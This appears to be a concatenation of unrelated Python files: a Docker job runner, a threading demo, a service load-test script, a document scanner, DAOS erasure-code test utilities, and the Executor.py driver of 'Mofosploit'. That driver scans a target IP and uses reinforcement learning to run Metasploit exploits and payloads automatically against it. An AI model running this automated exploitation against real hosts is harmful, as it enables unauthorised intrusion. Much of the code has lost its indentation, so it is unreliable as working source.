#this will load the image back into docker
os.system("unzip image.zip")
os.system("sudo docker load -i image.tgz")
#this will start the container in a bash
os.system("sudo docker run -dit execute:latest bash")
getTime('Docker Image Loaded and Executing')
#this will execute the code
#0 -> Provider
#1 -> Validator
mval = 0
if mode == 'validator':
mval = 1
os.system("sudo docker exec $(sudo docker container ls -q) python3 execute.py " + str(mval) )
#this will delete the old image file
os.system("sudo rm -rf image.tgz")
#this will update the container
os.system("sudo docker commit $(sudo docker container ls -q) execute:latest")
getTime("Execution Finished")
#this will remove the image to be transmitted to the next step
os.system("sudo docker save execute -o image.tgz")
#zip the image
os.system('sudo zip -0 image.zip image.tgz')
#this will stop the docker image
os.system("sudo docker stop $(sudo docker container ls -q)")
getTime('Image Unloaded and Ready For Transmission')
time.sleep(30)
def getMode():
global mode
flag = True
while flag:
time.sleep(5)
if os.path.isfile('mode.txt'):
f = open("mode.txt", "r")
curLine = f.readline().rstrip()
f.close()
if(curLine == "provider" or curLine == 'validator' or curLine == "user"):
mode = curLine
flag = False
f = open('mode.txt', 'w')
f.close()
def submitTask():
f = open('stat.txt', 'w')
f.close()
f = open('stat.txt', 'w')
f.write('Ready')
f.close()
if __name__ == '__main__':
f = open('mode.txt', 'w') #make sure mode is cleared on startup
f.close()
while True:
getMode()
if mode == 'user':
hostController('image.zip')
flag = True
while flag:
f = open('stat.txt', 'r')
line = f.read()
f.close()
if line.find('onionshare') != -1:
flag = False
time.sleep(5)
reqController()
elif mode == 'provider':
resetHost(False)
reqController()
dockerExe()
submitTask()
try:
os.system("rm -rf totalOrder.txt totalOrder.zip")
except:
pass
hostController('image.zip')
elif mode == 'validator':
resetHost(False)
reqController()
dockerExe()
try:
os.system("rm -rf totalOrder.txt totalOrder.zip")
except:
pass
submitTask()
|
multi_threading_class.py
|
#-*- coding: utf-8 -*-
from threading import Thread
import time
class ThreadFunc(object):
def __init__(self, func, args, name=''):
self.name = name
self.func = func
self.args = args
def __call__(self):
        self.func(*self.args)  # Python 3: call the function directly (apply() was removed)
def loop(idx, nsec):
print("start loop", idx, " at ", time.ctime())
time.sleep(nsec)
    print("end loop", idx, " at ", time.ctime())
def main():
loops = [4, 2]
threads = []
print("Process start at ", time.ctime())
for ii in range(len(loops)):
t = Thread(
target=ThreadFunc(loop, (ii, loops[ii]), loop.__name__))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
print("Process done at ", time.ctime())
if "__main__" == __name__:
main()
|
sfn_message_test.py
|
# sfn_message_test.py
"""A script designed to test http request between the sfn_service and SCRAL"""
import json
import requests
from threading import Thread
import time
import argparse
import arrow
import os
import socket
from pathlib import Path
import random
import sys
sys.path.append(str(Path(__file__).absolute().parents[3]))
from WP5.KU.definitions import KU_DIR
import WP5.KU.SharedResources.loader_tools as tools
__version__ = '0.2'
__author__ = 'RoViT (KU)'
print(str(socket.gethostname()))
parser = argparse.ArgumentParser(description='"A simple load testing script to fire messages off to the SFN')
# parser.add_argument('--sfn_url', default='http://MPCLSGESFN01.monica-cloud.eu:5000/', type=str,
parser.add_argument('--sfn_url', default='http://0.0.0.0:5000/', type=str,
help='The URL and port the SFN is currently listening on')
parser.add_argument('--scral_url', default='http://monappdwp3.monica-cloud.eu:8000/', type=str,
                    help='The URL and port SCRAL is currently listening on')
parser.add_argument('--looping', default='False', type=str, help='Loop the message calls indefinitely.')
parser.add_argument('--threaded', default='False', type=str, help='sets up messages as separate threads')
parser.add_argument('--dataset_folder', default='/ocean/robdupre/PYTHON_SCRIPTS/MONICA_repo/WP5/KU/Algorithms/algorithm_output/',
type=str, help='Location of RiF JSON Files to send to SFN.')
def call_sfn(payload, n, module):
# UPDATE URLS AND CHECK LINKSMART
try:
r = requests.put(url + 'message', json=json.dumps(payload))
except requests.exceptions.RequestException as exception:
print('[INFO] Thread {} MODULE {} Failed:{}.'.format(n, module, exception))
else:
print('[INFO] Thread {} MODULE {} OK.'.format(n, module))
_args = parser.parse_args()
if __name__ == '__main__':
url = _args.sfn_url
scral_url = _args.scral_url
print('SFN URL:{}'.format(url))
print('SCRAL URL:{}'.format(scral_url))
num_cameras = 1
algorithm_process_time = 1
dataset_folder = _args.dataset_folder
if _args.looping == 'True':
looping = True
else:
looping = False
if _args.threaded == 'True':
threaded = True
else:
threaded = False
looping = True
sfn_urls = {'scral_url': scral_url}
message_locations = [
[os.path.join(dataset_folder), 'SAMPLE_fight_detection'],
[os.path.join(dataset_folder), 'SAMPLE_crowd_density_local'],
[os.path.join(dataset_folder), 'SAMPLE_flow'],
[os.path.join(dataset_folder), 'SAMPLE_action_recognition'],
[os.path.join(dataset_folder), 'SAMPLE_object_detection'],
]
num_algorithms = len(message_locations)
time_interval = (algorithm_process_time * num_cameras) / (num_algorithms * num_cameras)
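    # Equivalent to algorithm_process_time / num_algorithms; the num_cameras factors cancel out.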
# time_interval = 5
print('Messages will be sent every {} seconds'.format(time_interval))
configs = [
tools.load_settings(os.path.join(KU_DIR, 'KUConfigTool/cam_configs/'), 'TIVOLI_25'),
tools.load_settings(os.path.join(KU_DIR, 'KUConfigTool/cam_configs/'), 'TIVOLI_27'),
tools.load_settings(os.path.join(KU_DIR, 'KUConfigTool/cam_configs/'), 'TIVOLI_31'),
]
# CHECK CONNECTION WITH SFN
try:
resp = requests.get(url)
except requests.exceptions.RequestException as e:
print('WOO THERE, Something went wrong, error:' + str(e))
else:
print(resp.text, resp.status_code)
# UPDATE URLS
print('CHECKING URL UPDATE SFN')
try:
resp = requests.post(url + 'urls', json=json.dumps(sfn_urls))
except requests.exceptions.RequestException as e:
print('WOO THERE, Something went wrong, error:' + str(e))
else:
print(resp.text, resp.status_code)
# SEND THE CONFIGS AS IF VCA WERE UPDATING THE SFN
print('CHECKING CONFIG UPDATE SFN')
try:
resp = requests.post(url + 'configs', json=json.dumps(configs))
except requests.exceptions.RequestException as e:
print('WOO THERE, Something went wrong, error:' + str(e))
else:
print(resp.text, resp.status_code)
# SWITCH SFN TO DEBUGGING MODE
# print('SWITCH SFN TO DEBUGGING MODE')
# try:
# resp = requests.get(url + 'debug')
# except requests.exceptions.RequestException as e:
# print('WOO THERE, Something went wrong, error:' + str(e))
# else:
# print(resp.text, resp.status_code)
# HELLO SCRAL VIA SFN
print('CHECKING SFN CAN SEE SCRAL')
try:
resp = requests.get(url + 'scral')
except requests.exceptions.RequestException as e:
print('WOO THERE, Something went wrong, error:' + str(e))
else:
print(resp.text, resp.status_code)
if resp.ok:
counter = 0
while True:
cam = random.randint(0, len(configs)-1)
for mess_type in message_locations:
mess = tools.load_json_txt(mess_type[0], mess_type[1])
cam_conf = configs[cam]
mess['camera_ids'][0] = cam_conf['camera_id']
# ADD IF STATEMENTS FOR EACH MODULE TYPE
if mess['type_module'] == 'fighting_detection':
mess['timestamp'] = str(arrow.utcnow())
mess['confidence'] = random.randint(0, 10) / 10
elif mess['type_module'] == 'crowd_density_local':
mess['timestamp1'] = str(arrow.utcnow())
elif mess['type_module'] == 'flow':
mess['timestamp'] = str(arrow.utcnow())
elif mess['type_module'] == 'action_recognition':
mess['timestamp'] = str(arrow.utcnow())
elif mess['type_module'] == 'object_detection':
mess['timestamp'] = str(arrow.utcnow())
if threaded:
t = Thread(target=call_sfn, args=(mess, counter, mess['type_module'],))
t.daemon = True
t.start()
else:
call_sfn(mess, 1, mess['type_module'])
counter = counter + 1
time.sleep(time_interval)
if not looping:
break
|
Executor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from lib.Util.util import *
from lib import *
from lib.Metasploit import Metasploit
from lib.parameter_server import Server as ParameterServer
from lib.CreateReport import CreateReport
from Worker import Worker_thread
def show_banner(util, delay_time=2.0):
banner = u"""
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
███╗ ███╗ ██████╗ ███████╗ ██████╗ ███████╗██████╗ ██╗ ██████╗ ██╗████████╗
████╗ ████║██╔═══██╗██╔════╝██╔═══██╗██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
██╔████╔██║██║ ██║█████╗ ██║ ██║███████╗██████╔╝██║ ██║ ██║██║ ██║
██║╚██╔╝██║██║ ██║██╔══╝ ██║ ██║╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║
██║ ╚═╝ ██║╚██████╔╝██║ ╚██████╔╝███████║██║ ███████╗╚██████╔╝██║ ██║
╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
"""
util.print_message(NONE, banner)
show_credit(util)
time.sleep(delay_time)
def is_valid_ip(rhost):
try:
ipaddress.ip_address(rhost)
return True
except ValueError:
return False
def show_credit(util):
credit = u"""
+ -- --=[ Maintainer : Manish Bhatt (@mbhatt1) ]=--
+ -- --=[ Website : https://github.com/mbhatt1/Mofosploit ]=--
"""
util.print_message(NONE, credit)
# Define command option.
__doc__ = """{f}
Usage:
{f} (-t <ip_addr> | --target <ip_addr>) (-m <mode> | --mode <mode>)
{f} (-t <ip_addr> | --target <ip_addr>) [(-p <port> | --port <port>)] [(-s <product> | --service <product>)]
{f} -h | --help
Options:
-t --target Require : IP address of target server.
-m --mode Require : Execution mode "train/test".
-p --port Optional : Indicate port number of target server.
-s --service Optional : Indicate product name of target server.
-h --help Optional : Show this screen and exit.
""".format(f=__file__)
# Parse command arguments.
def command_parse():
args = docopt(__doc__)
ip_addr = args['<ip_addr>']
mode = args['<mode>']
port = args['<port>']
service = args['<product>']
return ip_addr, mode, port, service
# Check parameter values.
def check_port_value(port=None, service=None):
if port is not None:
if port.isdigit() is False:
Utilty().print_message(OK, 'Invalid port number: {}'.format(port))
return False
elif (int(port) < 1) or (int(port) > 65535):
Utilty().print_message(OK, 'Invalid port number: {}'.format(port))
return False
elif port not in com_port_list:
Utilty().print_message(OK, 'Not open port number: {}'.format(port))
return False
elif service is None:
Utilty().print_message(OK, 'Invalid service name: {}'.format(str(service)))
return False
        elif isinstance(service, int):  # type() never equals the string 'int'; check the type properly
Utilty().print_message(OK, 'Invalid service name: {}'.format(str(service)))
return False
else:
return True
else:
return False
# Common list of all threads.
com_port_list = []
com_exploit_list = []
com_payload_list = []
com_indicate_flag = False
if __name__ == '__main__':
util = Utilty()
# Get command arguments.
rhost, mode, port, service = command_parse()
if is_valid_ip(rhost) is False:
util.print_message(FAIL, 'Invalid IP address: {}'.format(rhost))
exit(1)
if mode not in ['train', 'test']:
util.print_message(FAIL, 'Invalid mode: {}'.format(mode))
exit(1)
# Show initial banner.
show_banner(util, 0.1)
# Initialization of Metasploit.
env = Metasploit(rhost)
if rhost in env.prohibited_list:
util.print_message(FAIL, 'Target IP={} is prohibited.\n'
' Please check "config.ini"'.format(rhost))
exit(1)
nmap_result = 'nmap_result_' + env.rhost + '.xml'
nmap_command = env.nmap_command + ' ' + nmap_result + ' ' + env.rhost + '\n'
env.execute_nmap(env.rhost, nmap_command, env.nmap_timeout)
com_port_list, proto_list, info_list = env.get_port_list(
nmap_result, env.rhost)
com_exploit_list = env.get_exploit_list()
com_payload_list = env.get_payload_list()
com_payload_list.append('no payload')
# Create exploit tree.
exploit_tree = env.get_exploit_tree()
# Create target host information.
com_indicate_flag = check_port_value(port, service)
if com_indicate_flag:
target_tree, com_port_list = env.get_target_info_indicate(
rhost, proto_list, info_list, port, service)
else:
target_tree = env.get_target_info(rhost, proto_list, info_list)
# Initialization of global option.
TRAIN_WORKERS = env.train_worker_num
TEST_WORKER = env.test_worker_num
MAX_STEPS = env.train_max_steps
MAX_TRAIN_NUM = env.train_max_num
Tmax = env.train_tmax
# Disconnect common MSFconsole.
env.client.termination(env.client.console_id)
NUM_ACTIONS = len(com_payload_list) # Set action number.
NONE_STATE = np.zeros(NUM_STATES) # Initialize state (s).
# Define global variable, start TensorFlow session.
frames = 0 # All trial number of all threads.
isFinish = False # Finishing learning/testing flag.
post_exploit_count = 0 # Number of successful post-exploitation.
exploit_count = 0 # Number of successful exploitation.
plot_count = [0] # Exploitation count list for plot.
plot_pcount = [0] # Post-exploit count list for plot.
SESS = tf.Session() # Start TensorFlow session.
with tf.device("/cpu:0"):
parameter_server = ParameterServer()
threads = []
if mode == 'train':
# Create learning thread.
for idx in range(TRAIN_WORKERS):
thread_name = 'local_thread' + str(idx + 1)
threads.append(Worker_thread(thread_name=thread_name,
thread_type="learning",
parameter_server=parameter_server,
rhost=rhost))
else:
# Create testing thread.
for idx in range(TEST_WORKER):
thread_name = 'local_thread1'
threads.append(Worker_thread(thread_name=thread_name,
thread_type="test",
parameter_server=parameter_server,
rhost=rhost))
# Define saver.
saver = tf.train.Saver()
# Execute TensorFlow with multi-thread.
COORD = tf.train.Coordinator() # Prepare of TensorFlow with multi-thread.
SESS.run(tf.global_variables_initializer()) # Initialize variable.
running_threads = []
if mode == 'train':
# Load past learned data.
if os.path.exists(env.save_file) is True:
# Restore learned model from local file.
util.print_message(OK, 'Restore learned data.')
saver.restore(SESS, env.save_file)
# Execute learning.
        for worker in threads:
            # Bind the current worker explicitly; a bare closure would make every
            # thread use whichever worker the loop variable points to last.
            def job(worker=worker): return worker.run(exploit_tree, target_tree, saver, env.save_file)
            t = threading.Thread(target=job)
            t.start()
else:
# Execute testing.
# Restore learned model from local file.
util.print_message(OK, 'Restore learned data.')
saver.restore(SESS, env.save_file)
        for worker in threads:
            # Bind the current worker explicitly to avoid the late-binding closure pitfall.
            def job(worker=worker): return worker.run(exploit_tree, target_tree)
            t = threading.Thread(target=job)
            t.start()
|
bulkscan.py
|
#!/usr/bin/python3
# bulkscan - Document scanning and maintenance solution
# Copyright (C) 2019-2019 Johannes Bauer
#
# This file is part of bulkscan.
#
# bulkscan is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; this program is ONLY licensed under
# version 3 of the License, later versions are explicitly excluded.
#
# bulkscan is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with bulkscan; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Johannes Bauer <JohannesBauer@gmx.de>
import os
import sys
import uuid
import json
import subprocess
import datetime
import glob
import re
import queue
import time
import threading
from Tools import Tools
from FriendlyArgumentParser import FriendlyArgumentParser
class ConversionJob():
def __init__(self, infile, outfile, meta = None):
self._infile = infile
self._outfile = outfile
self._meta = meta
def start(self):
jsonexif = json.dumps(self._meta)
subprocess.check_call([ "convert", "-units", "PixelsPerInch", "-density", str(self._meta["resolution"]), "-comment", jsonexif, self._infile, self._outfile ])
os.unlink(self._infile)
def __str__(self):
return "%s -> %s" % (self._infile, self._outfile)
class JobServer():
def __init__(self, concurrent_jobs = 12):
self._queue = queue.Queue()
self._threads = [ threading.Thread(target = self._thread_function) for i in range(concurrent_jobs) ]
self._quit = False
for thread in self._threads:
thread.start()
def add(self, job):
self._queue.put(job)
def shutdown(self):
self._quit = True
while not self._queue.empty():
time.sleep(1)
def _thread_function(self):
while True:
try:
job = self._queue.get(timeout = 0.1)
job.start()
except queue.Empty:
if self._quit:
break
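# A minimal usage sketch for JobServer (hypothetical DummyJob standing in for
# ConversionJob): any object exposing a start() method can be queued.
#
#   class DummyJob:
#       def start(self):
#           print("processing one page")
#
#   server = JobServer(concurrent_jobs=2)
#   server.add(DummyJob())
#   server.shutdown()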
class BatchScanner():
def __init__(self, args):
self._args = args
with open(self._args.config_file) as f:
self._config = json.load(f)
try:
os.makedirs(self._args.outdir)
except FileExistsError:
pass
self._scan_id = 0
        regex = re.compile(r"^bulk_(?P<id>\d{5})")
for filename in os.listdir(self._args.outdir):
match = regex.match(filename)
if match:
match = match.groupdict()
self._scan_id = max(self._scan_id, int(match["id"]))
self._jobserver = JobServer(concurrent_jobs = 12)
def scan_next_batch(self):
batch_uuid = str(uuid.uuid4())
scan_cmd = [ "scanimage", "--mode", self._args.mode, "--resolution", str(self._args.resolution), "--batch=" + self._args.tempdir + "/scan_" + batch_uuid + "_%05d.pnm" ] + self._config["scan_cmdline"]
subprocess.call(scan_cmd)
infiles = [ ]
        regex = re.compile("scan_" + batch_uuid + r"_(?P<no>\d{5})\.pnm")
for filename in glob.glob(self._args.tempdir + "/scan_" + batch_uuid + "_?????.pnm"):
match = regex.search(filename)
match = match.groupdict()
pageno = int(match["no"])
infiles.append((pageno, filename))
infiles.sort()
now = datetime.datetime.utcnow()
for (pageno, infile) in infiles:
self._scan_id += 1
outfile = self._args.outdir + "/bulk_%05d_%05d.png" % (self._scan_id, pageno)
job = ConversionJob(infile = infile, outfile = outfile, meta = {
"batch_uuid": batch_uuid,
"created_utc": now.strftime("%Y-%m-%dT%H:%M:%SZ"),
"resolution": self._args.resolution,
"mode": self._args.mode,
})
self._jobserver.add(job)
def run(self):
while True:
result = input("Ready to scan next batch (q to quit)...")
result = result.strip()
if result == "q":
break
self.scan_next_batch()
self._jobserver.shutdown()
parser = FriendlyArgumentParser()
parser.add_argument("-c", "--config-file", metavar = "filename", type = str, default = "config.json", help = "Configuration file to read. Defaults to %(default)s.")
parser.add_argument("-o", "--outdir", metavar = "dirname", type = str, default = "output/", help = "Output directory to place files in. Defaults to %(default)s.")
parser.add_argument("-r", "--resolution", metavar = "dpi", type = int, default = 300, help = "Resolution to use in dots per inch, defaults to %(default)d dpi.")
parser.add_argument("-m", "--mode", choices = [ "gray" ], default = "gray", help = "Scan mode to use. Can be one of %(choices)s, defaults to %(default)s.")
parser.add_argument("-t", "--tempdir", metavar = "dirname", type = str, default = "/tmp", help = "Temporary directory to keep raw files. Defaults to %(default)s")
args = parser.parse_args(sys.argv[1:])
scanner = BatchScanner(args)
scanner.run()
|
ec_utils.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2022 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import re
import threading
import queue
import time
from nvme_utils import ServerFillUp
from daos_utils import DaosCommand
from test_utils_container import TestContainer
from apricot import TestWithServers
from mdtest_test_base import MdtestBase
from fio_test_base import FioBase
from pydaos.raw import DaosApiError
from exception_utils import CommandFailure
from general_utils import DaosTestError, run_pcmd
def get_data_parity_number(log, oclass):
"""Return EC Object Data and Parity count.
Args:
log: Log object for reporting error
oclass(string): EC Object type.
return:
        result(dict): 'data' and 'parity' numbers parsed from the object type (0 if not an EC class).
"""
if 'EC' not in oclass:
log.error("Provide EC Object type only and not %s", str(oclass))
return 0
tmp = re.findall(r'\d+', oclass)
return {'data': tmp[0], 'parity': tmp[1]}
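# Example (hypothetical oclass string): get_data_parity_number(log, "EC_2P1GX")
# returns {'data': '2', 'parity': '1'} -- note the values are strings.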
def check_aggregation_status(pool, quick_check=True, attempt=20):
"""EC Aggregation triggered status.
Args:
pool(object): pool object to get the query.
quick_check(bool): Return immediately when Aggregation starts for any storage type.
attempt(int): Number of attempts to do pool query at interval of 5 seconds.
default is 20 attempts.
return:
        result(dict): Storage Aggregation stats SCM/NVMe True/False.
"""
agg_status = {'scm': False, 'nvme': False}
pool.connect()
initial_usage = pool.pool_percentage_used()
for _tmp in range(attempt):
current_usage = pool.pool_percentage_used()
print("pool_percentage during Aggregation = {}".format(current_usage))
for storage_type in ['scm', 'nvme']:
if current_usage[storage_type] > initial_usage[storage_type]:
print("Aggregation Started for {}.....".format(storage_type))
agg_status[storage_type] = True
# Return immediately once aggregation starts for quick check
if quick_check:
return agg_status
time.sleep(5)
return agg_status
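# A minimal usage sketch (assuming `pool` is an already created test pool object):
#
#   agg = check_aggregation_status(pool, quick_check=True, attempt=10)
#   if agg['scm'] or agg['nvme']:
#       print("aggregation has started")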
class ErasureCodeIor(ServerFillUp):
# pylint: disable=too-many-ancestors
"""
    Class used for EC testing.
    It gets the object types from the yaml file and writes the data set with IOR.
"""
def __init__(self, *args, **kwargs):
"""Initialize a ServerFillUp object."""
super().__init__(*args, **kwargs)
self.server_count = None
self.ec_container = None
self.cont_uuid = []
self.cont_number = 0
self.read_set_from_beginning = True
self.nvme_local_cont = None
def setUp(self):
"""Set up each test case."""
# Start the servers and agents
super().setUp()
# Fail IOR test in case of Warnings
self.fail_on_warning = True
engine_count = self.server_managers[0].get_config_value("engines_per_host")
self.server_count = len(self.hostlist_servers) * engine_count
# Create the Pool
self.create_pool_max_size()
self.update_ior_cmd_with_pool()
self.obj_class = self.params.get("dfs_oclass_list", '/run/ior/objectclass/*')
self.ior_chu_trs_blk_size = self.params.get("chunk_block_transfer_sizes", '/run/ior/*')
def ec_container_create(self, oclass):
"""Create the container for EC object"""
# Get container params
self.ec_container = TestContainer(self.pool, daos_command=DaosCommand(self.bin))
self.ec_container.get_params(self)
self.ec_container.oclass.update(oclass)
# update object class for container create, if supplied explicitly.
ec_object = get_data_parity_number(self.log, oclass)
rf = "rf:{}".format(ec_object['parity'])
if self.ec_container.properties.value is None:
self.ec_container.properties.update(rf)
else:
self.ec_container.properties.update("{},{}"
.format(self.ec_container.properties.value, rf))
# create container
self.ec_container.create()
self.nvme_local_cont = self.ec_container
def ior_param_update(self, oclass, sizes):
"""Update the IOR command parameters.
Args:
oclass(list): list of the obj class to use with IOR
sizes(list): Update Transfer, Chunk and Block sizes
"""
self.ior_local_cmd.dfs_chunk.update(sizes[0])
self.ior_local_cmd.block_size.update(sizes[1])
self.ior_local_cmd.transfer_size.update(sizes[2])
self.ior_local_cmd.dfs_oclass.update(oclass[0])
self.ior_local_cmd.dfs_dir_oclass.update(oclass[0])
def ior_write_single_dataset(self, oclass, sizes, storage='NVMe', operation="WriteRead",
percent=1):
# pylint: disable=too-many-arguments
"""Write IOR single data set with EC object.
Args:
oclass(list): list of the obj class to use with IOR
sizes(list): Update Transfer, Chunk and Block sizes
storage(str): Data to be written on storage,default to NVMe.
operation(str): Data to be Written only or Write and Read both. default to WriteRead
both
percent(int): %of storage to be filled. Default it will use the given parameters in
yaml file.
"""
try:
self.log.info(self.pool.pool_percentage_used())
except ZeroDivisionError:
self.log.info("Either SCM or NVMe is used so ignore the error")
self.ior_param_update(oclass, sizes)
# Create the new container with correct redundancy factor for EC
self.ec_container_create(oclass[0])
self.update_ior_cmd_with_pool(create_cont=False)
# Start IOR Write
self.start_ior_load(storage, operation, percent, create_cont=False)
# Store the container UUID for future reading
self.cont_uuid.append(self.ior_local_cmd.dfs_cont.value)
def ior_write_dataset(self, storage='NVMe', operation="WriteRead", percent=1):
"""Write IOR data set with different EC object and different sizes.
Args:
storage(str): Data to be written on storage, default to NVMe
operation(str): Data to be Written only or Write and Read both. default to WriteRead
both.
percent(int): %of storage to be filled. Default it's 1%.
"""
for oclass in self.obj_class:
for sizes in self.ior_chu_trs_blk_size:
# Skip the object type if server count does not meet the minimum EC object server
# count
if oclass[1] > self.server_count:
continue
self.ior_write_single_dataset(oclass, sizes, storage, operation, percent)
def ior_read_single_dataset(self, oclass, sizes, storage='NVMe', operation="Read", percent=1):
# pylint: disable=too-many-arguments
"""Read IOR single data set with EC object.
Args:
oclass(list): list of the obj class to use with IOR
sizes(list): Update Transfer, Chunk and Block sizes
storage(str): Data to be written on which storage
operation(str): Data to be Read only or Auto_Read which select IOR blocksize during
runtime.
percent(int): %of storage to be filled. Default it's 1%.
"""
self.ior_param_update(oclass, sizes)
# retrieve the container UUID to read the existing data
self.nvme_local_cont.uuid = self.cont_uuid[self.cont_number]
# Start IOR Read
self.start_ior_load(storage, operation, percent, create_cont=False)
def ior_read_dataset(self, storage='NVMe', operation="Read", percent=1, parity=1):
"""Read IOR data and verify for different EC object and different sizes
Args:
storage(str): Data to be written on storage, default to NVMe
percent(int): %of storage to be filled. Default it's 1%
operation(str): Data to be Read only or Auto_Read which select IOR blocksize during
runtime.
parity(int): object parity type for reading data, default is 1.
"""
# By default read the data set from beginning, or start from the specific container UUID
if self.read_set_from_beginning:
self.cont_number = 0
for oclass in self.obj_class:
for sizes in self.ior_chu_trs_blk_size:
# Skip the object type if server count does not meet the minimum EC object server
# count.
if oclass[1] > self.server_count:
continue
parity_set = "P{}".format(parity)
# Read the requested data+parity data set only
if parity != 1 and parity_set not in oclass[0]:
print("Skipping Read as object type is {}".format(oclass[0]))
self.cont_number += 1
continue
self.ior_read_single_dataset(oclass, sizes, storage, operation, percent)
self.cont_number += 1
class ErasureCodeSingle(TestWithServers):
# pylint: disable=too-many-ancestors
# pylint: disable=too-many-instance-attributes
"""
    Class used for EC testing with single type data.
"""
def __init__(self, *args, **kwargs):
"""Initialize a TestWithServers object."""
super().__init__(*args, **kwargs)
self.server_count = None
self.set_online_rebuild = False
self.rank_to_kill = None
self.daos_cmd = None
self.container = []
def setUp(self):
"""Set up each test case."""
# Start the servers and agents
super().setUp()
engine_count = self.server_managers[0].get_config_value(
"engines_per_host")
self.server_count = len(self.hostlist_servers) * engine_count
self.obj_class = self.params.get("dfs_oclass_list", '/run/objectclass/*')
self.singledata_set = self.params.get("single_data_set", '/run/container/*')
self.add_pool()
self.out_queue = queue.Queue()
def ec_container_create(self, index, oclass):
"""Create the container for EC object
Args:
index(int): container number
oclass(str): object class for creating the container.
"""
self.container.append(TestContainer(self.pool))
# Get container parameters
self.container[index].get_params(self)
# update object class for container create, if supplied explicitly.
self.container[index].oclass.update(oclass)
# Get the Parity count for setting the container RF property.
ec_object = get_data_parity_number(self.log, oclass)
self.container[index].properties.update("rf:{}".format(ec_object['parity']))
# create container
self.container[index].create()
def single_type_param_update(self, index, data):
"""Update the data set content provided from yaml file.
Args:
index(int): container number
data(list): dataset content from test yaml file.
"""
self.container[index].object_qty.update(data[0])
self.container[index].record_qty.update(data[1])
self.container[index].dkey_size.update(data[2])
self.container[index].akey_size.update(data[3])
self.container[index].data_size.update(data[4])
def write_single_type_dataset(self, results=None):
"""Write single type data set with different EC object and different sizes.
Args:
results (queue): queue for returning thread results
"""
cont_count = 0
for oclass in self.obj_class:
for sizes in self.singledata_set:
# Skip the object type if server count does not meet the minimum EC object server
# count
if oclass[1] > self.server_count:
continue
# Create the new container with correct redundancy factor for EC object type
try:
self.ec_container_create(cont_count, oclass[0])
self.single_type_param_update(cont_count, sizes)
# Write the data
self.container[cont_count].write_objects(obj_class=oclass[0])
cont_count += 1
if results is not None:
results.put("PASS")
except (CommandFailure, DaosApiError, DaosTestError):
if results is not None:
results.put("FAIL")
raise
def read_single_type_dataset(self, results=None, parity=1):
"""Read single type data and verify for different EC object and different sizes.
Args:
results (queue): queue for returning thread results
parity(int): object parity number for reading, default All.
"""
cont_count = 0
self.daos_cmd = DaosCommand(self.bin)
for oclass in self.obj_class:
for _sizes in self.singledata_set:
# Skip the object type if server count does not meet the minimum EC object server
# count
if oclass[1] > self.server_count:
continue
parity_set = "P{}".format(parity)
# Read the requested data+parity data set only
if parity != 1 and parity_set not in oclass[0]:
print("Skipping Read as object type is {}".format(oclass[0]))
cont_count += 1
continue
self.daos_cmd.container_set_prop(pool=self.pool.uuid,
cont=self.container[cont_count].uuid,
prop="status",
value="healthy")
# Read data and verified the content
try:
if not self.container[cont_count].read_objects():
if results is not None:
results.put("FAIL")
self.fail("Data verification Error")
cont_count += 1
if results is not None:
results.put("PASS")
except (CommandFailure, DaosApiError, DaosTestError):
if results is not None:
results.put("FAIL")
raise
def start_online_single_operation(self, operation, parity=1):
"""Do Write/Read operation with single data type.
Args:
operation (string): Write/Read operation
"""
# Create the single data Write/Read threads
if operation == 'WRITE':
job = threading.Thread(target=self.write_single_type_dataset,
kwargs={"results": self.out_queue})
elif operation == 'READ':
job = threading.Thread(target=self.read_single_type_dataset,
kwargs={"results": self.out_queue,
"parity": parity})
# Launch the single data write/read thread
job.start()
# Kill the server rank while IO operation in progress
if self.set_online_rebuild:
time.sleep(10)
# Kill the server rank
if self.rank_to_kill is not None:
self.server_managers[0].stop_ranks([self.rank_to_kill], self.d_log, force=True)
# Wait to finish the thread
job.join()
# Verify the queue and make sure no FAIL for any run
while not self.out_queue.empty():
if self.out_queue.get() == "FAIL":
self.fail("FAIL")
class ErasureCodeMdtest(MdtestBase):
# pylint: disable=too-many-ancestors
"""
    Class used for EC testing with the MDtest benchmark.
"""
def __init__(self, *args, **kwargs):
"""Initialize a MdtestBase object."""
super().__init__(*args, **kwargs)
self.server_count = None
self.set_online_rebuild = False
self.rank_to_kill = None
self.obj_class = None
def setUp(self):
"""Set up each test case."""
super().setUp()
engine_count = self.server_managers[0].get_config_value("engines_per_host")
self.server_count = len(self.hostlist_servers) * engine_count
self.obj_class = self.params.get("dfs_oclass_list", '/run/mdtest/objectclass/*')
# Create Pool
self.add_pool()
self.out_queue = queue.Queue()
def write_single_mdtest_dataset(self):
"""Run MDtest with EC object type.
"""
# Update the MDtest obj class
self.mdtest_cmd.dfs_oclass.update(self.obj_class)
# Write the MDtest data
self.execute_mdtest(self.out_queue)
def start_online_mdtest(self):
"""Run MDtest operation with thread in background. Trigger the server failure while
MDtest is running
"""
# Create the MDtest run thread
job = threading.Thread(target=self.write_single_mdtest_dataset)
# Launch the MDtest thread
job.start()
# Kill the server rank while IO operation in progress
if self.set_online_rebuild:
time.sleep(30)
# Kill the server rank
if self.rank_to_kill is not None:
self.server_managers[0].stop_ranks([self.rank_to_kill],
self.d_log,
force=True)
# Wait to finish the thread
job.join()
# Verify the queue result and make sure test has no failure
while not self.out_queue.empty():
if self.out_queue.get() == "Mdtest Failed":
self.fail("FAIL")
class ErasureCodeFio(FioBase):
# pylint: disable=too-many-ancestors
"""
